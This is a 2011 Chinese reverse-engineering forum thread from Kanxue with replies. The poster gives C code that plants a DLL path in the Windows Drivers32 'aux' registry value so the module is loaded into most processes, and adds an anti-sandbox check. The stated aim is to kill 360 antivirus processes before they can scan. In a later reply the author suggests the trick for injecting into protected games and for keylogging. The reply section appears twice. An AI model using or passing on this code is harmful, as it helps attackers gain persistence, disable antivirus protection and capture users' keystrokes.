[原创]让360加载我们的模块（你干什么都行）-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[原创]让360加载我们的模块（你干什么都行）

发表于: 2011-4-12 11:15 23370

[原创]让360加载我们的模块（你干什么都行）

woshixutao 活跃值

2011-4-12 11:15

23370

只在XP下面测试通过，发现之前杀毒软件是扫不出来的，最近测试快速扫描回扫描出有非法启动项，但是还是可以过主动的，可以一上来就干掉360safe.exe和360sd.exe让他不能扫描

测试代码是这样的：
BOOL MyDllRun(char* dllPath)
{
HKEY hkey=NULL;
if(RegOpenKeyExA(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32",0,KEY_ALL_ACCESS,&hkey)==S_OK)
{
if(RegSetValueEx(hkey,"aux",0,REG_SZ,(LPBYTE)dllPath,strlen(dllPath))==S_OK)
return TRUE;
}
return FALSE;
}

VOID TestExeception()
{
// 通过杀毒软件目录的不可读写来反虚拟执行
char buf[255]={0};
GetModuleFileName(NULL,buf,255);
PathRemoveFileSpec(buf);
PathAppend(buf,"9.txt");
HANDLE hfile=CreateFile(buf,GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL|FILE_FLAG_DELETE_ON_CLOSE,NULL);
if(hfile!=INVALID_HANDLE_VALUE)
{
ExitProcess(0);
}
MyDllRun("e:\\123.sys");
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd )
{
TestExeception();
return 0;
}

上面主要是写入注册表，MyDllRun传入一个需要360注入的模块路径，运行360的时候回加载

我的123.sys的代码是检测加载的模块是不是360sd和360safe，是的话就ExitProcess(0);这个误杀率极高的杀毒软件就起不来了。

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・21

免费・7

支持

最新回复 (43) 1 2 ▶
woshixutao 雪币： 243 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 22 粉丝 0 关注私信	woshixutao 2 楼 VOID TestExeception() { // 通过杀毒软件目录的不可读写来反虚拟执行 char buf[255]={0}; GetModuleFileName(NULL,buf,255); PathRemoveFileSpec(buf); PathAppend(buf,"9.txt"); HANDLE hfile=CreateFile(buf,GENERIC_ALL,FILE_SHARE_READ\|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL\|FILE_FLAG_DELETE_ON_CLOSE,NULL); if(hfile==INVALID_HANDLE_VALUE) { ExitProcess(0); } MyDllRun("e:\\123.sys"); } 2011-4-12 11:19 0
狂起来雪币： 85 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 15 回帖 146 粉丝 0 关注私信	狂起来 3 楼 sys的代码呢？ 2011-4-12 12:51 0
woshixutao 雪币： 243 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 22 粉丝 0 关注私信	woshixutao 4 楼一个dll文件，写你的任何代码？后缀是sys可不是驱动哟！我的dllmian里面只有一句ExitProcess； 2011-4-12 13:21 0
李小龙lxl 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 26 粉丝 0 关注私信	李小龙lxl 5 楼前排观望，坐等激烈的讨论。 2011-4-12 18:15 0
QEver 雪币： 233 活跃值： (285) 能力值： ( LV12，RANK：270 ) 在线值：发帖 32 回帖 581 粉丝 4 关注私信	QEver 5 6 楼又一个管理员权限过主防的～～ 2011-4-12 18:43 0
Jeller 雪币： 209 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 186 粉丝 0 关注私信	Jeller 7 楼我看好你哦。 2011-4-12 18:50 0
孟贤雪币： 414 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 261 粉丝 1 关注私信	孟贤 8 楼 "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32" 这个键360会加载？我觉得是楼主电脑启动的时候速度较快~声卡先加载上了~ 2011-4-12 18:56 0
hacker一疒亻雪币： 261 活跃值： (83) 能力值： ( LV3，RANK：20 ) 在线值：发帖 42 回帖 418 粉丝 0 关注私信	hacker一疒亻 9 楼同意楼上的。建议楼主还是写一个完整的程序，然后在一台正常使用的电脑上测试一下，看看是否会有如期的效果吧。我读了你的代码，感觉360不会上这个当的。期待你的附件。 2011-4-12 19:31 0
hacker一疒亻雪币： 261 活跃值： (83) 能力值： ( LV3，RANK：20 ) 在线值：发帖 42 回帖 418 粉丝 0 关注私信	hacker一疒亻 10 楼同意楼上的。建议楼主还是写一个完整的程序，然后在一台正常使用的电脑上测试一下，看看是否会有如期的效果吧。我读了你的代码，感觉360不会上这个当的。期待你的附件。 2011-4-12 19:31 0
付崇碧雪币： 49 活跃值： (29) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 80 粉丝 1 关注私信	付崇碧 11 楼楼主的思路很巧妙。 2011-4-12 20:01 0
tihty 雪币： 27 活跃值： (90) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 1095 粉丝 3 关注私信	tihty 2 12 楼真的可以让360加载吗? 2011-4-13 01:29 0
zuoyefeng 雪币： 237 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 124 粉丝 0 关注私信	zuoyefeng 13 楼 ”在XP下面测试通过，发现之前杀毒软件是扫不出来的，最近测试快速扫描回扫描出有非法启动项，但是还是可以过主动的，可以一上来就干掉360safe.exe和360sd.exe让他不能扫描“ 2011-4-13 10:43 0
痞子辉雪币： 308 活跃值： (25) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 231 粉丝 0 关注私信	痞子辉 1 14 楼我来支持楼主。。。。楼主的方法很精妙。。 2011-4-13 14:26 0
liein 雪币： 217 活跃值： (67) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 78 粉丝 0 关注私信	liein 15 楼这个代码很快就失效了即便能用的 2011-4-13 14:51 0
jacklj 雪币： 16 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 15 粉丝 0 关注私信	jacklj 16 楼感觉不像是真的！！ 2011-4-13 16:13 0
kmsmxpro 雪币： 123 活跃值： (50) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 82 粉丝 0 关注私信	kmsmxpro 17 楼感谢楼主分享 2011-4-13 16:26 0
cvcvxk 雪币： 8865 活跃值： (2379) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 233 关注私信	cvcvxk 10 18 楼等360升级中~ 2011-4-13 16:29 0
大小人物雪币： 350 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 56 粉丝 0 关注私信	大小人物 19 楼不知道可行性如何…劳驾楼主写个完整程序 2011-4-13 16:56 0
woshixutao 雪币： 243 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 22 粉丝 0 关注私信	woshixutao 20 楼 1. 这个的原理本来是微软的winmm.dll根据注册表加载的，也就是说凡是用到winmm.dll函数的进程都会加载这个模块。 2. 测试大部分的程序都会加载，主流的杀毒软件和各种小程序，一般都是在系统初始化进程的时候就加载了 3.用处：可以用来对付那些需要注入，但是有很强驱动保护的游戏，等等。大部分的程序都会加载那么可以用它来做键盘记录（避免全局hook过不了主动的问题）。 2011-4-14 10:46 0
GzsIceberg 雪币： 115 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 26 粉丝 0 关注私信	GzsIceberg 21 楼先留名看一下。。 2011-4-14 11:13 0
EvilKnight 雪币： 358 活跃值： (662) 能力值： ( LV9，RANK：170 ) 在线值：发帖 22 回帖 618 粉丝 16 关注私信	EvilKnight 4 22 楼支持楼主。。。。。。。 2011-4-14 13:34 0
xzchina 雪币： 615 活跃值： (1132) 能力值： ( LV4，RANK：50 ) 在线值：发帖 42 回帖 843 粉丝 0 关注私信	xzchina 1 23 楼支持下...... 2011-4-14 13:38 0
hezhang 雪币： 677 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 123 粉丝 0 关注私信	hezhang 24 楼强 111111111111111 2011-4-14 14:12 0
mumaren 雪币： 71 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 659 粉丝 0 关注私信	mumaren 25 楼 mark一下备用 2011-4-14 19:41 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

woshixutao

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (43) 1 2 ▶
woshixutao 雪币： 243 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 22 粉丝 0 关注私信	woshixutao 2 楼 VOID TestExeception() { // 通过杀毒软件目录的不可读写来反虚拟执行 char buf[255]={0}; GetModuleFileName(NULL,buf,255); PathRemoveFileSpec(buf); PathAppend(buf,"9.txt"); HANDLE hfile=CreateFile(buf,GENERIC_ALL,FILE_SHARE_READ\|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL\|FILE_FLAG_DELETE_ON_CLOSE,NULL); if(hfile==INVALID_HANDLE_VALUE) { ExitProcess(0); } MyDllRun("e:\\123.sys"); } 2011-4-12 11:19 0
狂起来雪币： 85 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 15 回帖 146 粉丝 0 关注私信	狂起来 3 楼 sys的代码呢？ 2011-4-12 12:51 0
woshixutao 雪币： 243 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 22 粉丝 0 关注私信	woshixutao 4 楼一个dll文件，写你的任何代码？后缀是sys可不是驱动哟！我的dllmian里面只有一句ExitProcess； 2011-4-12 13:21 0
李小龙lxl 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 26 粉丝 0 关注私信	李小龙lxl 5 楼前排观望，坐等激烈的讨论。 2011-4-12 18:15 0
QEver 雪币： 233 活跃值： (285) 能力值： ( LV12，RANK：270 ) 在线值：发帖 32 回帖 581 粉丝 4 关注私信	QEver 5 6 楼又一个管理员权限过主防的～～ 2011-4-12 18:43 0
Jeller 雪币： 209 活跃值： (19) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 186 粉丝 0 关注私信	Jeller 7 楼我看好你哦。 2011-4-12 18:50 0
孟贤雪币： 414 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 261 粉丝 1 关注私信	孟贤 8 楼 "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32" 这个键360会加载？我觉得是楼主电脑启动的时候速度较快~声卡先加载上了~ 2011-4-12 18:56 0
hacker一疒亻雪币： 261 活跃值： (83) 能力值： ( LV3，RANK：20 ) 在线值：发帖 42 回帖 418 粉丝 0 关注私信	hacker一疒亻 9 楼同意楼上的。建议楼主还是写一个完整的程序，然后在一台正常使用的电脑上测试一下，看看是否会有如期的效果吧。我读了你的代码，感觉360不会上这个当的。期待你的附件。 2011-4-12 19:31 0
hacker一疒亻雪币： 261 活跃值： (83) 能力值： ( LV3，RANK：20 ) 在线值：发帖 42 回帖 418 粉丝 0 关注私信	hacker一疒亻 10 楼同意楼上的。建议楼主还是写一个完整的程序，然后在一台正常使用的电脑上测试一下，看看是否会有如期的效果吧。我读了你的代码，感觉360不会上这个当的。期待你的附件。 2011-4-12 19:31 0
付崇碧雪币： 49 活跃值： (29) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 80 粉丝 1 关注私信	付崇碧 11 楼楼主的思路很巧妙。 2011-4-12 20:01 0
tihty 雪币： 27 活跃值： (90) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 1095 粉丝 3 关注私信	tihty 2 12 楼真的可以让360加载吗? 2011-4-13 01:29 0
zuoyefeng 雪币： 237 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 124 粉丝 0 关注私信	zuoyefeng 13 楼 ”在XP下面测试通过，发现之前杀毒软件是扫不出来的，最近测试快速扫描回扫描出有非法启动项，但是还是可以过主动的，可以一上来就干掉360safe.exe和360sd.exe让他不能扫描“ 2011-4-13 10:43 0
痞子辉雪币： 308 活跃值： (25) 能力值： ( LV4，RANK：50 ) 在线值：发帖 7 回帖 231 粉丝 0 关注私信	痞子辉 1 14 楼我来支持楼主。。。。楼主的方法很精妙。。 2011-4-13 14:26 0
liein 雪币： 217 活跃值： (67) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 78 粉丝 0 关注私信	liein 15 楼这个代码很快就失效了即便能用的 2011-4-13 14:51 0
jacklj 雪币： 16 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 15 粉丝 0 关注私信	jacklj 16 楼感觉不像是真的！！ 2011-4-13 16:13 0
kmsmxpro 雪币： 123 活跃值： (50) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 82 粉丝 0 关注私信	kmsmxpro 17 楼感谢楼主分享 2011-4-13 16:26 0
cvcvxk 雪币： 8865 活跃值： (2379) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 233 关注私信	cvcvxk 10 18 楼等360升级中~ 2011-4-13 16:29 0
大小人物雪币： 350 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 56 粉丝 0 关注私信	大小人物 19 楼不知道可行性如何…劳驾楼主写个完整程序 2011-4-13 16:56 0
woshixutao 雪币： 243 活跃值： (40) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 22 粉丝 0 关注私信	woshixutao 20 楼 1. 这个的原理本来是微软的winmm.dll根据注册表加载的，也就是说凡是用到winmm.dll函数的进程都会加载这个模块。 2. 测试大部分的程序都会加载，主流的杀毒软件和各种小程序，一般都是在系统初始化进程的时候就加载了 3.用处：可以用来对付那些需要注入，但是有很强驱动保护的游戏，等等。大部分的程序都会加载那么可以用它来做键盘记录（避免全局hook过不了主动的问题）。 2011-4-14 10:46 0
GzsIceberg 雪币： 115 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 26 粉丝 0 关注私信	GzsIceberg 21 楼先留名看一下。。 2011-4-14 11:13 0
EvilKnight 雪币： 358 活跃值： (662) 能力值： ( LV9，RANK：170 ) 在线值：发帖 22 回帖 618 粉丝 16 关注私信	EvilKnight 4 22 楼支持楼主。。。。。。。 2011-4-14 13:34 0
xzchina 雪币： 615 活跃值： (1132) 能力值： ( LV4，RANK：50 ) 在线值：发帖 42 回帖 843 粉丝 0 关注私信	xzchina 1 23 楼支持下...... 2011-4-14 13:38 0
hezhang 雪币： 677 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 123 粉丝 0 关注私信	hezhang 24 楼强 111111111111111 2011-4-14 14:12 0
mumaren 雪币： 71 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 659 粉丝 0 关注私信	mumaren 25 楼 mark一下备用 2011-4-14 19:41 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复